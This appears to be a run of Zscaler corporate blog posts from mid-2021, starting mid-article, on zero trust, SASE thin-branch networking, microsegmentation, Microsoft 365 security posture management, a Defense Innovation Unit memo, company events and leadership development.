Risk assessment is an ongoing process, with new vulnerabilities surfacing daily. Bringing in third parties to identify loopholes in security compliance through methods like penetration testing can be quite insightful. Security consultants and supporting software applications can give great insight into the potential risks to your network.
Consider a zero trust mentality
As the name implies, the zero trust model assumes that anything attempting to enter, leave, or relocate within a network cannot be trusted and should be verified or cleared by a governing system. This can give companies a significant advantage given the patchwork of on-premises and cloud solutions, proprietary and third-party applications, and closed networks and shared access. Add remote work and innumerable devices to the mix, and the idea of trusting nothing can suddenly seem like the safest route. Companies can plug existing holes in their infrastructure and reduce long-term risk with this approach, and boards stand to learn much by researching this option.
Create a culture of transparency
While you certainly do not want to share details about any outstanding gaps in your cybersecurity protocols, transparency can still present benefits. In the event of a breach, disclose anything that should be declared to stakeholders and customers.
This instills faith and trust that the board is doing everything in its power to address issues, protect data, and take ownership of any failings.
The path forward is constantly shifting
Above all, a board of directors must understand that cybersecurity is a dynamic discipline that requires unending monitoring and innovation. Laying the groundwork for reduced risk is essential, but so is the knowledge that risk will always be there. Companies should also assess their existing insurance policies, whether they adequately cover asset value in the event of a breach, and whether dedicated cyber insurance may help further mitigate risk. But no matter the size of your insurance policy, leadership must remain involved and educated in cybersecurity for the business and prepare policies and procedures in the event of a breach with an eye toward responsibility.
Disclaimer: This article has been created by Zscaler for informational purposes only and may not be relied upon as legal advice. We encourage you to consult with your own legal advisor with respect to how the contents of this document may apply specifically to your organization, including your unique obligations under applicable law and regulations. ZSCALER MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT AND IT IS PROVIDED “AS-IS”. Information and views expressed in this document, including URL and other internet website references, may change without notice.
Thu, 08 Jul 2021 08:00:01 -0700 Les Ottolenghi
The (Thick) Branch is Dead. Long Live the (Thin) Branch.
This post also appeared on LinkedIn.
Even with the pandemic (hopefully) winding down, mass remote work will stick around for the foreseeable future. Twitter, Google, Facebook, Deutsche Bank and other globally recognized companies are letting their employees work from home at least through the summer, if not longer. But what about beyond?
Comprehensive studies, such as McKinsey's, indicate that most companies will keep work-from-anywhere (WFA) as a permanent part of their corporate strategy. But what does this look like? Based on my conversations with various companies in different sectors, the WFA answer isn't black and white. Most likely, some split of people in vs. out of the office will continue, and a new hybrid model will take hold as the norm. The next logical question is, what about the expensive investments in physical data centers located on high-priced office campuses? As companies dusted off their business continuity plans during the pandemic, many saw traffic and workloads shift quickly from complex network and security stacks to remote connections. What does this mean for legacy equipment and architectures?
What do we do about the internet?
Managing internet traffic is a significant portion of the IT department's daily struggle. It makes up 40 to 70 percent of all corporate traffic. Continued adoption of SaaS applications like Microsoft 365, Workday, and ServiceNow will only increase this percentage. As more people work outside the corporate office and connect to more cloud-based applications and infrastructures, more traffic gets backhauled or “tromboned” through the classical IT infrastructure. This increase can congest and overwhelm legacy network security infrastructure. As more employees moved outside the office during the pandemic, legacy network and security setups struggled to handle the unanticipated onslaught of users working from home. Why? With very little time to prepare for quarantines, organizations couldn't build or scale legacy infrastructure fast enough to meet new expectations, such as where, how, and when workforces were using apps.
This lack of scalability led to a poor user experience for millions of remote workers afflicted by complicated security processes: friction-filled logins, complex architectures that made finding applications difficult, and poorly performing applications due to backhauled internet-bound traffic. Frankly, many users confronted with this experience looked for quick ways to bypass controls. This behavior, while understandable, opened a new can of worms by increasing the network attack surface: each additional device that remotely tries to connect to corporate content is a potential attack vector!
Get lean, get svelte, get “thin”
A better alternative to the situation described above is using direct internet connections from the branch office. They're certainly cheaper (even for higher bandwidths). But they do require proper security, which often results in complex network and security stacks at the branch office. For remote work (or an office of one), this isn't a viable option. The right approach is to replace the traditional heavy branch model with a cloud-centric, thin branch model using a Secure Access Service Edge (SASE) architecture. In a paper, Gartner succinctly posits this concept in the way that only industry analysts can:
Instead of forcing (via “tromboning”) various entities' traffic to inspection engines entombed in boxes in the data center, we need to invert our thinking to bring the inspection engines and algorithms closest to where the entities are located.
The chart below captures the difference between a heavy and a thin branch:
- Heavy branch: Has security applied locally in the form of hardware.
- Thin branch: Relies heavily on centralized cloud control for managing security and access.
Gartner suggests that most networking actions should be delivered from the cloud in WFA models. Any decisions not made in the cloud should be made as close to the edge as possible, with as light a touch on the device as possible.
As we've seen play out the world over during the pandemic, a heavy-branch model required physical network changes to the systems that allowed employees to access applications and assets at branch locations. Upgrading equipment at every branch (e.g., VPN access) to accommodate growing traffic was cost-intensive, and procurement was slow since companies were ordering new stacks of gear at the same time as every other company. The thin-branch/heavy-cloud model provides more agility and can auto-scale to meet virtually any requirement, since the compute is offloaded to a heavy cloud.
Thin is cost-effective and secure
With vaccinations and loosening social distancing requirements, companies will allow employees back into the office. They can ease back on some of the scaling they've done for branches, but how much? With expanded remote work here to stay, what happens to the investments made toward achieving a thin branch? Beyond where employees sit while they work, many companies will need to find ways to scale back costs. One method might be scaling back on physical locations completely. Using SASE architectures and Zero Trust models can enable a company to scale up connections faster than ever while scaling back on physical locations. During the crisis, I've watched companies go from tens of branch offices to thousands of branch offices—of one employee. Allowing employees to work wherever they want using whatever connections and equipment they want—secured by identity-based zero trust—means less overhead and a better employee experience for those who've found success and balance working from anywhere. On a side note, an article I read recently seems to suggest that some organizations will keep some hub-and-spoke architectures alive via an HQ and temporary satellite offices (e.g., rented office space like WeWork, Regus, etc.) to ensure that employees can meet and exchange work-related plans. This isn't an architecture model, however, but a conceptual localization plan.
In fact, the more companies adopt temporary meeting spaces for in-person gatherings, the more they are going to need non-traditional security models that use identity to link users to applications. It's not inconceivable that many branch locations employing SASE architectures could simply use 4G/5G SIM cards as a primary connection. With Zero Trust, this connection could provide the security, agility, and cost savings that would mean an acceleration in opening new “branches.” There are many benefits to going thin from a security standpoint, since you don't need to constantly provision, update, and maintain hardware appliances. Nor do you even need an MPLS or VPN connection. That means you reduce your attack surface, complexity, and costs.
The office is dead; long live the office!
The office as we know it is not yet dead, but the COVID-19 crisis has shown that the new hybrid workplace requires scalable solutions. Newer architectures such as SASE and Zero Trust that support today's realities are replacing legacy networks and delivering the agility and resiliency that businesses need to compete and succeed in the modern, digital landscape. These architectures use the internet as the new corporate network and the cloud as the new data center. Zero trust architectures create less expensive and better-performing security by securing connections between users and applications and removing the need for costly infrastructure services. As the new hybrid workforce takes shape, thin branch office models that include work-from-home options will be necessary for modern business. Therefore, the office is dead; long live the office!
Tue, 06 Jul 2021 08:00:01 -0700 Kevin Schwarz
Defense Innovation Unit Issues Success Memo to Zscaler
Today, we are proud to share that the Department of Defense (DoD) Defense Innovation Unit (DIU) announced that Zscaler successfully completed a Secure Cloud Management (SCM) prototype.
The project launched in May 2020, and the evaluation confirms that Zscaler can deliver fast, secure, and controlled access to SaaS cloud services directly over the Internet, simplifying DIU's ability to engage with non-traditional technology vendors. A third party assessed the prototype using Defense Information Systems Agency (DISA)-developed criteria. DIU then issued a success memo to Zscaler, enabling Department of Defense (DoD) organizations to contract with vendors without needing to re-compete.
“These solutions simplify engagement with non-traditional technology vendors by allowing DIU users to collaborate in real time. The solutions provide equivalent security and control to the DoD's Cloud Access Point (CAP) while delivering real-time performance, which is critical for such things as videoconferencing and file sharing,” said John Chen, interim CIO for DIU.
Zscaler is focused on giving customers access to modern, mission-critical applications, including those that require the most stringent security and work in some of the world's most remote and challenging environments.
“The DoD is working to strengthen cyber defenses on many fronts. DIU is exploring and testing new innovative approaches in security architecture. CMMC is in its final stages to improve security consistency to all contractors working with the federal government,” said Patrick Perry, Director of Emerging Technology, Zscaler. “But, we have to approach things differently than in the past. Government as a whole can transform security by taking a user-centric approach, where the first priority is to protect the data, then provide secure access once contextual validation occurs, and finally applying appropriate security based on risk scoring – whether accessing the internet or applications that reside in an on-prem data center or using a cloud service.”
The Zscaler Zero Trust Exchange is consistent with the May 2021 Executive Order on Improving the Nation's Cybersecurity and with DISA's recently published Zero Trust Reference Architecture. The DIU anticipates that the project's results will help inform DoD entities as they formulate their own zero trust plans. The Zero Trust Exchange platform includes Zscaler Private Access (ZPA), a FedRAMP-High JAB authorized network access service that connects trusted users directly to trusted cloud applications, and Zscaler Internet Access (ZIA), the first secure internet gateway solution to earn FedRAMP certification. ZIA is currently prioritized for FedRAMP-High JAB authorization.
Benefits include:
- Zero attack surface: apps are never exposed to the internet; you can't attack what you can't see.
- Direct connections to an app, not a network: a segment of one, with no exposure of any additional resources or data and no ability to move laterally or connect to C&C servers.
- Proxy architecture, not passthrough: full content inspection, including SSL; holds and inspects unknown files before they reach the endpoint.
- Multitenant architecture: cloud-native, multi-tenant design with continuous security updates.
- Secure Access Service Edge (SASE): policy enforced at the edge in 150 data centers, peering in internet exchanges, hundreds of apps.
This project underscores the Pentagon's continued modernization commitment. Maximum telework accelerated change, and today workforce expectations and needs continue to evolve. Cyber-adversaries continue to seek new ways to take advantage of vulnerabilities. Zero trust-based secure cloud access is core to the foundation for mission success. For more information, see the DIU's press release here.
Thu, 01 Jul 2021 17:22:54 -0700 Drew Schnabel
Zscaler + Coursera: The Journey to Leading at Z
Since its inception, Zscaler has always prioritized its people, searching diligently for the best talent and making employee retention a key focus.
However, every company has its challenges with hiring and retention, and Zscaler is no exception. When I joined Zscaler in August 2020, I was the first member of a new team called talent development. My first goal was to assess the health of our people and culture strategies to figure out what was working well and where we could make improvements. Over several weeks, I spoke with leaders and team members across the company. There were a number of things that were going exceptionally well—we had a strong cultural compass in T.O.P.I.C. (Teamwork, Open Communication, Passion, Innovation and Customer Obsession), we had a high-performing recruiting engine that was scaling to enable our growth, and we had a team of people and culture professionals who were seen as true business partners. That said, we also had opportunities to be more intentional with our investments in the development of our people, especially our managers. For that reason, we set out to build programming that would enable all Zscaler leaders, aspiring through senior-level, to live and lead by our Leadership Principles.
Based on what we learned through our discovery process, we set four design principles to guide our work:
1. Leadership is a journey. The best leaders are always looking to learn, grow, and improve.
2. Everyone is great at something, but no one is great at everything. Each of us has strengths. The magic happens when you can help people and companies leverage them.
3. Development can be really simple. Clear expectations + an understanding of how you're doing against those expectations + focused opportunities to improve = Development.
4. No one likes being told what to do, but most people appreciate a bit of direction. Mandating training can undermine impact. Approaching development too “laissez-faire” can lead to it being deprioritized. Giving people “freedom within a framework” will leverage the benefits of both with the challenges of neither.
In February 2021, we launched Leading at Z—clear expectations, a measurement tool we call the Manager Effectiveness Survey, and focused development opportunities aimed at enabling our leaders to live and lead by our Leadership Principles. To help us drive adoption, one of the greatest measures of success, we've built a microsite where all Zscaler employees can access each element of the program, including development content from partners such as Coursera, ExecOnline, and Rapid Learning, to name a few. This site is also where our people access crowd-sourced TED Talks, books, and other materials that align with our Leadership Principles.
In a recent webinar with Coursera's Deborah Mussomeli, I described how Zscaler is elevating training with the Coursera platform as we build a workforce for the cloud. Register here for the webinar.
Leadership is a journey
Leadership is a journey, one without a well-defined destination. With Leading at Z, we set out to enable Zscaler leaders' success by helping them to enhance their skills and develop new ones. We do this by helping them understand where they are in their journey, and by offering the focused development that enables them to unlock their potential. We've only just got Leading at Z off the ground, but we're thrilled with the engagement. We're now focused on creating the virtual communities that enable our leaders to learn and grow together. Further, we're leveraging our Leading at Z learnings to build the program we call Succeeding at Z, which will enable all Zscalers to identify their professional ambitions and progress towards them.
Since its founding, Zscaler has focused on building a lasting company that enables its customers to succeed in the digital world. It is incumbent on the company's leadership to create an environment that attracts great employees and allows them to thrive. Leading at Z is just the beginning, and I'm excited about its early indicators of success and the launch of what's next. Stay tuned.
To learn about career opportunities at Zscaler, please visit:
Tue, 29 Jun 2021 08:00:02 -0700
Zero Trust Microsegmentation: It's All About the Data
The digital nature of today's businesses puts significant pressure on cybersecurity practitioners to be everywhere—all the time. As a result, it's easy to forget the fundamental reasons for managing and operating a security program. The reason for implementing good security practices—namely, microsegmentation—isn't to achieve more secure workloads, devices, or people on the network, but to protect data. Data should be at the heart of every security strategy, and therefore every security framework, tool, and process used should be focused on the data itself. Yet security teams expend tremendous effort to “secure the network” to try to keep the bad guys out. Doing so, however, spreads security teams thin while failing to provide the context required to defend against modern adversaries.
Effective implementations of microsegmentation keep data at the core of the strategy. While there are many different ways to accomplish microsegmentation, the goals of any initiative should be to:
- Improve visibility and breach detection
- Localize security controls around critical assets
- Reduce capital and operational expenses
- Reduce compliance costs
- Increase data awareness and insight
- Eliminate internal finger-pointing
- Enable digital business transformation
Combining microsegmentation with a zero trust strategy is an even greater initiative. Not surprisingly, zero trust and microsegmentation have similar benefits; when merged into one security strategy, security teams have a hardened method to isolate data and systems, stop the propagation of malware, and truly understand what's going on across their ecosystems.
Protecting the data
While zero trust microsegmentation allows security teams to better protect workloads, users, and devices, the key thing a security program is supposed to focus on is protecting the data.
Microsegmentation allows security teams to put the right segments, controls, technologies, and capabilities in place, and zero trust requires that everything trying to communicate across segments—inside and between data centers and cloud environments—is continually assessed for proper authorization and authentication. Enforcement of controls in a zero trust infrastructure happens with every communication request, which means that data assets are always protected from lateral movement and the propagation of malware, even if an attacker has already exploited an endpoint. Why? Because zero trust microsegmentation means that infected systems can be segmented away from other systems, that granular controls are in place to ensure the attacker can't piggyback on approved policies to access desired systems or data, and that the core of the distributed network—the data—always remains isolated.
Without segmentation, on the other hand, once an attack moves past endpoint protection, there's no way to stop it. This is exactly what happens in the infrastructure of a flat computer network. When segmentation—or better yet, microsegmentation—isn't present, security controls effectively decide that “you're here, and you've been here before, so go ahead and keep moving.” Zero trust microsegmentation clamps down on such overly permissive networks because everything is designed to be isolated. Each application, host, and service is given its own segment that is protected by fine-grained controls based on the criticality and sensitivity of what's inside that segment (i.e., data), not on what may be traveling around outside of the segment (e.g., IP addresses, ports, and protocols; unmonitored communication pathways).
A new form of segmentation
Microsegmentation has a bad reputation, though. When security practitioners hear the term, many automatically associate it with unsuccessful projects of the past.
Because most companies make extensive use of cloud computing and software-as-a-service, data stores are not always easy to find, and the data in them is even harder to classify. This is why zero trust is so critical to microsegmentation. Zero trust places security controls directly around the data assets adversaries are targeting, uses least-privileged access controls, and only allows access to or between data assets after verification is met—every time a communication is requested. Localizing and isolating data assets becomes much easier. Security teams can stop focusing on trying to protect hundreds of thousands of endpoints and instead look at the data itself—what’s communicating and how. Zero trust microsegmentation allows you to place the greatest security controls around what’s most important (your data), where it is, and how it’s being accessed.

Additional reading:
Microsegmentation 101: What it is, how it works, and why it's key to a zero trust security strategy
Is Microsegmentation a Security Project or an Infrastructure Project?
How Microsegmentation Differs from Network Segmentation

Thu, 01 Jul 2021 08:00:01 -0700 Nagraj Seshadri Why You Need SaaS Security Posture Management (SSPM) for Microsoft 365

Companies embrace Microsoft 365 (M365) to reduce IT complexity and drive end-user productivity and collaboration. Over 258 million people use the Microsoft 365 productivity and collaboration suite today. Featuring business-critical products such as Exchange, SharePoint, Word, Excel, PowerPoint, Outlook, and OneDrive, it’s not hard to see why it has become so popular. While M365 brings a range of benefits to organizations and users alike, it can also introduce challenges to your overall security posture and to your security teams. According to IBM Security’s 2020 Cost of a Data Breach report, attacks directed at cloud services, particularly collaboration tools like Microsoft 365, have increased significantly.
Remote work due to the pandemic has been a significant contributor to M365 security incidents, as attackers know that many people are working from home on unmanaged devices and connecting over unsecured networks or VPNs. Security concerns are valid, as cybercriminals have shown that they’re more than capable of taking advantage of any security misconfigurations or shortcomings. One simple misconfiguration can expose an organization’s most sensitive data, leading to devastating financial and reputational consequences. The challenge for the IT security team is not only protecting sensitive data against internal threats but also retaining security, compliance, and uniform policy enforcement. Unfortunately, with limited resources, tools, and budgets, IT leaders are asked to do more with less, such as ensuring a healthy M365 security posture, maintaining the secure and compliant use of M365, and remaining agile in the face of unforeseen events. Microsoft 365 provides built-in policies, foundational and premium security controls, and systems. It analyzes 6.5 trillion signals every day to identify emerging threats. It includes native security at various levels (depending on your license). Overall, it does a good job securing data within its ecosystem, providing data protection within the operating system, applications, and documents, but it might not be enough for the enterprise. According to Gartner estimates, “50% of Office 365 deployments will rely on third-party tools to fill security and compliance gaps as well as maintain consistent security policies.” Six reasons why IT leaders should consider SSPM to protect their Microsoft 365 environments. Reason 1: Shared responsibility – Enterprises are still responsible for M365 configuration, secure deployment, crucial data, and access to the data. 
Enterprise responsibilities also include assessing security and compliance and maintaining a secure posture by identifying and correcting potential threats before they result in a breach. Enterprises often overlook a critical M365 security consideration: how to automate the security posture of M365 to reduce the risk of data loss due to configuration errors.

Reason 2: Limited visibility – The increased use of the M365 platform compounds concerns about visibility and team collaboration, enlarges the attack surface, and puts the enterprise at a high risk of ineffective control over M365.

Reason 3: Limited control over sensitive data – Data leaks and breaches comprise the most severe M365 security threats. Broad data and application access privileges must be allotted to certain users and administrators, but in a dynamic business environment, people tend to move around and change roles—unfortunately, their privileges don’t always change with them, leading to over-privileged access. Such users have the potential to change configurations or accidentally share sensitive data inappropriately. Excess privileges are risky and compromise security, especially with sensitive M365 data. M365 and add-on apps make it easy to connect workers around the globe. But the M365 platform is primarily managed by the local administrator within the organization. Locally, manually managed applications are likely to drift out of security compliance over time and get exposed to internal and external threats.

Reason 4: Security and compliance enforcement – Regulated industries must comply with ever-changing rules, including SOC 2, ISO 27001, NIST CSF, NIST 800-53, as well as industry and government requirements, such as PCI, HIPAA, and GDPR. Most of M365’s compliance features are limited to the platform. Access to the compliance features varies by license and by product/application. This creates unnecessary complexity, business risk, and operational stress when enforcing security best practices.
Reason 5: Rapid detection and response – The targeted attacks on M365 are rising in proportion to the growing adoption, which means that detection and response capabilities are essential. Enterprises need a proactive approach with automated risk detection through alerts and notification, policy enforcement, and guided remediation to mitigate the risk.

Reason 6: Operational challenges – Most enterprises do not have a dedicated SaaS security budget or expertise, and their tools are limited. M365 includes multiple applications, and each one can have hundreds of controls and settings that need to be continually adjusted and tweaked to adapt to the changing needs of the enterprise. M365 has no set default policies or settings that can be relied upon to provide the necessary access and functionality while maintaining the required security. Hence, M365 is often left unsecured by the security team due to limited budget, visibility, and expertise.

The solution

Maintaining a secure M365 posture, protecting sensitive data, and enforcing a consistent set of policies and remediation actions is a challenge. With the complex M365 configuration setup and limited control and visibility, M365 configuration errors will remain a central issue that enterprises must confront and ultimately overcome if they want to get the most from their Microsoft 365 capabilities. Zscaler recommends an automated M365 security posture management approach with SSPM that identifies, prioritizes, and automatically remediates risk in a highly efficient and effective way. SSPM can audit sensitive configurations to allow automatic remediation of configuration errors and enforce critical security controls. Incident reporting and remediation workflows drive greater operational efficiency. Enforcing the same policies across all M365 services will also prevent policy enforcement gaps.
SSPM, along with CSPM, will help you make the most of your M365 deployment and ensure that you continue to meet your security, compliance, and governance requirements.

Projected benefits of SaaS Security Posture Management (SSPM) for securing the M365 environment:
Reduced likelihood of a data breach.
Less time that IT and security teams must spend monitoring, assessing, and governing risks manually.
Increased visibility and control over M365.
Adherence to ever-changing industry compliance rules and regulations—audit-ready reports with ease.
Ease of deployment, instant visibility and control, and no burden on the IT team.

Please connect with us directly to learn more about Zscaler CSPM/SSPM for M365 or schedule a demo.

Mon, 28 Jun 2021 08:00:02 -0700 Mahesh Nawale How to Successfully Roll Out M365: Remote Work as a Transformation Template

This post also appeared on LinkedIn. When I worked in the area of network and security architectures in a previous life, we’d plan, assess, and make IT decisions right after the new year. Now that we are approaching the end of the global lockdown, I think most IT departments are asking a lot of questions: what have we done rightly, wrongly, and what can we take away when moving forward. If I were still doing my old job, I would capitalize on the changes IT made that allowed people to successfully and securely work outside of the corporate office. Mass remote work made IT teams realize that legacy network security perimeters don’t scale well when rolling out work-from-home solutions—especially for traffic-heavy apps like Microsoft 365 (M365). Besides increased backhaul costs, tunneling all M365 traffic through branch or headquarter security perimeters drastically reduces performance and can cause M365 deployments to fail.

The legacy problem

Enterprise modernization is top of mind for CIOs. For many, M365 rollout and improved productivity in an increasingly geographically diverse environment are ongoing projects.
Enterprise-wide adoption of M365 requires a serious review of how network architecture processes and secures traffic. Microsoft recommends breaking out M365 application traffic quickly and with no security (they promise that they are a secure source). But for most organizations this is a non-starter:
They have a hub-and-spoke model that processes all branch traffic (including remote employees).
They can’t use a split tunnel architecture or breakout locally (e.g., via SD-WAN).
They have sacrosanct and legacy security policies.

In traditional hub-and-spoke models, all internet traffic travels from the user, over the corporate network, and out towards the internet. Adding M365 creates an overwhelming amount of application traffic—even with many corporate HQs boasting “large pipes.”

Figure 1. Perimeter security processing traffic before it heads to an internet destination.

Beyond day-to-day M365 usage traffic, application updates for hundreds if not thousands of users can easily overwhelm enterprise infrastructure’s capacity. IT teams’ frustration when fighting to maintain employee productivity when using “productivity” software is understandable—and not a particularly good look for an M365 rollout in general. Simply scaling existing physical network capacity isn’t a good solution, either. Doubling the size of your physical network architecture capacity often means doubling the size of your WAN OPEX spend (not to mention the CAPEX cost of new equipment). It doesn’t solve the problem long-term (given Moore’s Law, you’ve put it off for a year, maybe), and you aren’t winning any executive friends or building executive team trust. It can cause M365 deployments to fail before they start.

Moving forward

I have a better answer: use the internet as your network. One of the (very few) upsides of the pandemic is proof that using the internet as the corporate network is a secure transport solution. COVID-19 forced companies to send all employees to work from home.
In essence, these home offices became “branches of one.” When remote traffic flooded legacy enterprise networks via these “branch” office connections (often over VPN), application and network performance took a hit. The better move is to let remote users access cloud applications directly from their local internet connections. But you need to secure those direct connections. Many companies solved the problem by coupling direct internet access with inline cloud security. With direct internet access, it’s unnecessary to backhaul traffic through complex perimeter security stacks, no matter where the users or applications sit. Instead, users can connect to applications directly over the internet. Traffic is sent directly and securely to its destination, eliminating the need for backhaul, reducing latency, and removing complex security stacks at the HQ or branch edge.

Figure 2. Direct internet connectivity for Internet and SaaS workloads

Using an inline security solution:
Offloads internet traffic from the network (up to 60% of your traffic is bound for the internet) using local internet as your transport layer
Reduces latency by sending cloud-application traffic directly to the cloud
Reduces MPLS traffic and associated costs
Provides corporate-perimeter-level security to remote users
Increases visibility into user and workload activity for security and performance optimization.

The pandemic made remote workers an ideal test case for accelerating M365 rollouts by successfully showing that direct internet access can provide an “on-premises” experience no matter where users work. You can apply this test case to examine where direct internet connections could be a better solution than legacy architecture. With most users working remotely and creating more traffic for your WAN/MPLS connections, an inline cloud security solution lets you adopt the internet as a critical element in your connectivity strategy.
It’s crucial to analyze your overall enterprise security strategy and work in conjunction with the various infrastructure teams to examine what guidelines, restrictions, and governance might limit immediate action. Determine if a cloud security solution that allows direct internet access to cloud applications allows for more local internet breakouts. Gartner describes a “Thin Branch/Heavy Cloud” model based on a Secure Access Service Edge (SASE) architecture, where security is pushed out of the physical network and into the cloud. Keep this model as your guide, and don’t over-complicate your network with unnecessary products if you can simply forward traffic directly to the internet.

Zero trust eliminates legacy dependence

A zero trust cloud security solution can help you easily make the most out of productivity software investment and pandemic response solutions and help accelerate M365 adoption. You have to work closely with networking, end-user, and security teams to identify solutions that can simplify network and security architectures using SASE solutions. By offloading traffic from your network to the internet securely, you can reduce dependence on legacy networking and security architectures. That means accelerated M365 adoption, greater productivity, and, ultimately, better business outcomes. The vast number of remote employees is an unprecedented opportunity—make them your test case that demonstrates a successful direct-to-internet M365 deployment. They can be the critical mass that highlights how the internet can be your transport layer, and accelerate your secure digital transformation.

Thu, 24 Jun 2021 08:00:01 -0700 Kevin Schwarz The Asia-Pacific Region is Moving Full Cloud Ahead

Zenith Live APJ marks the end of what I believe was our most extensive and possibly our best Zenith Live to date.
First of all, thank you to all our attendees, customers, partners, and speakers across the Asia-Pacific region whose enthusiasm and insights made this event as successful as it was. Zenith Live APJ featured two days of real-world accounts of business transformation, with keynotes, panels, demos, and training, leaving us all with a lot to explore further as we move forward together on our transformation journeys. With that in mind, I wanted to share a quick summary of this year's Zenith Live APJ so you can catch up on anything you may have missed. Let's begin with day one. Day one highlights Kicking things off was Zscaler CEO Jay Chaudhry, who started the conference by acknowledging how challenging last year was for IT teams around the globe. Yet, perseverance and quick thinking kept organizations running and employees working. He also touched on how the pandemic expedited the need to build modern infrastructures around zero trust. In Jay's words, "IT has proven time and again its resilience in not just adapting to change but being the catalyst for change." Continuing, he detailed how our cloud-native platform, the Zscaler Zero Trust Exchange, assisted countless customers in quickly transitioning to work-from-anywhere, while enabling new capabilities for the returning hybrid workforce. He highlighted the three ways the Zscaler platform is helping businesses transform. They include modernizing the workplace to enable work from anywhere, eliminating the attack surface to reduce risk by transforming security so that it can be everywhere, blocking cyberattacks, preventing data loss, and stopping lateral threat movement. You can watch Jay's keynote and many of the other sessions on-demand: Insights from APJ CXO panel Following Jay's opening remarks, I took the digital stage with top APJ CXOs, including Mohit Kapoor of Mahindra Group and Lucious Lubo of Tech Mahindra. 
During this CXO panel, I had the pleasure of chatting with both leaders about how they securely leveraged the power of the cloud to modernize their businesses, offer more products and services, and drive innovation, all while streamlining their digital footprints. Mohit and Lucious both cited security built around zero trust as a critical factor in their ability to modernize at the speed they did, allowing them to quickly scale secure app access for employees, partners, and customers. Moreover, both Mohit and Lucious spoke to me about the very real threats to their supply chain, factories, and manufacturing processes with the recent uptick in these sorts of attacks. With Zscaler, not only can they better protect these systems, but they can also identify and recover from threats in real time. Leading change: Women in IT Also, on day one was our fireside chat, Women in IT: Expanding Influence and Leading Change. Tanya Graham, Executive General Manager of Strategic Programs at Healthscope, joined Zscaler's Kavitha Mariappan for a candid conversation about C-level attainment and making an industry-wide impact by leveraging emotional intelligence, mentoring others, and conviction. During this session, both leaders touched on how you can advocate for inclusion by using your career story to inspire a new generation of leaders—and how all leaders can champion the creation of supportive and equitable workplace communities. Day two highlights Day two began with part two of "Innovating at the Speed of Cloud," with Amit Sinha, Steve House, and Tony Paterra. This session covered enhancements across the Zscaler platform, including inline and out-of-band CASB for better data protection and compliance. Moreover, they shared insight into security innovations, including more robust threat protection and expanded Cloud Browser Isolation capabilities in ZIA and ZPA services to isolate users and devices from potentially risky content. 
Customers provided powerful insights

The morning continued with insights from Rasik Vekaria of BP, David Branik of DHL, and Andrew Baker of Absa group. During these inspiring sessions, all three leaders addressed how they improved business agility and resiliency despite the pandemic. Each customer exec shared how they are using zero trust to successfully modernize their companies and deliver enhanced user experiences and improved security to their employees—regardless of location. All of us here in APJ are grateful to all the customers who joined us and spoke at Zenith Live in keynote sessions, panels, and technical breakout sessions. Thank you!

ThreatLabZ keynote: Insights from the front lines of the world's largest security cloud

Zscaler ThreatLabZ experts presented research into emerging attacks discovered and analyzed with the world's largest security cloud. The panel dissected recent attacks while sharing best practices on securing your enterprise from sophisticated threats targeting your software, supply chain, Microsoft Exchange servers, and more. That said, this session wasn't all doom and gloom. Deepen Desai detailed how Zscaler's disruptive protection suite unifies our industry-leading threat intelligence, world-class experts, and innovative technology to give you peace of mind from the most advanced attackers.

Partners highlighted their commitment to secure transformation

Creating a robust ecosystem of partners whose technologies complement the Zscaler Zero Trust Exchange is critical for successfully helping customers become more secure, agile, and resilient in the APJ region. Today's partner summit celebrated precisely that—a group of technology evangelists and leaders joining forces to continue the digital transformation momentum over the next year and beyond. This concludes Zenith Live APJ 2021 and what an event it was. On behalf of Zscaler, I would like to thank you for making this our best Zenith Live yet!
We hope you found our speaker sessions, training, panels, and workshops informative and relevant as you continue moving full cloud ahead. If you missed Zenith Live, be sure to view sessions on demand: We hope to see you next year! Wed, 23 Jun 2021 13:32:28 -0700 Scott Robertson How Getting Outside Your Comfort Zone Will Change Your Career We all have aspirations of the person we want to become and the things we want to achieve. Humanity has benefitted countless times from the ripple effects of such visions. But ask anyone who tasted the success of their dreams in fruition, and you will learn that you cannot become the person you are destined to be if you stay in your comfort zone. Realizing your wildest dreams requires growth, expansion, and change. You have to commit, at least temporarily, to the struggle. If something scares you a little, if you have butterflies in your stomach and you are wondering, “Can I do this? Am I going to fail?” Those are signs of leaning into the challenge. Growth happens when you stretch yourself and change the narrative about what is possible. True success stems from taking risks, being unafraid to fail, and committing to constant learning. Throughout my career, it’s also been clear to me that an individual’s path to success will accelerate through outstanding leadership. I’ve been fortunate to learn different leadership, communication, and management styles, as well as go-to-market systems, processes, and methodologies from exceptional leaders. I believe in paying it forward. As I’ve gone through my leadership career, it’s been my mission to build foundational platforms through which others can learn, grow, evolve, and become the best versions of themselves at a broad scale. Our ambition at Zscaler is about more than just numbers. We are building a true “home” for talented people who can grow with us for many years to come. 
I’ve had two recent opportunities to reflect and share my ideas around building and executing a Go-To-Market motion. As I discuss in the webinar with Sandi Lurie, VP of Talent Acquisition at Zscaler, it’s imperative to present your team with the right opportunities on an ongoing basis. It was clear to me that Zscaler was an exceptional opportunity to shape an industry and provide the platform for everyone involved to experience expansive personal growth. We have the chance to do something special and say, “let me rediscover and reinvent myself, and I’ll build a platform for others to do the same.” I also had the pleasure of joining a recent podcast episode with People.AI. We discussed more of the methodology behind cultivating success strategically and at scale. One key element is to deliver consistent training for both individual contributors and their leaders. If we can create an environment where intellectual, professional, financial, and career growth opportunities abound—then not only will revenue inevitably follow, but we will have directly changed people’s lives. That is the legacy I strive for and is the basis of the platform we’re building and refining at Zscaler. Zscaler is growing at hyperspeed. With the broad and lasting adoption of zero-trust and working-from-anywhere, we are the entity to guide companies into the digital future and secure their cloud transformation. Our Zero Trust Exchange is a purpose-built and cloud-native, cohesive platform and is truly the only one of its kind. By believing in our mission and disruptive technology, we find and nurture the greatest minds to continue innovating and moving the company forward. When asked about the reasons why she is excited about working at Zscaler, Dawn Ambrose, Channel Account Manager at Zscaler, explained: First, it’s the technology. Zscaler is the right technology at the right time. Second, it’s the people. People truly matter.
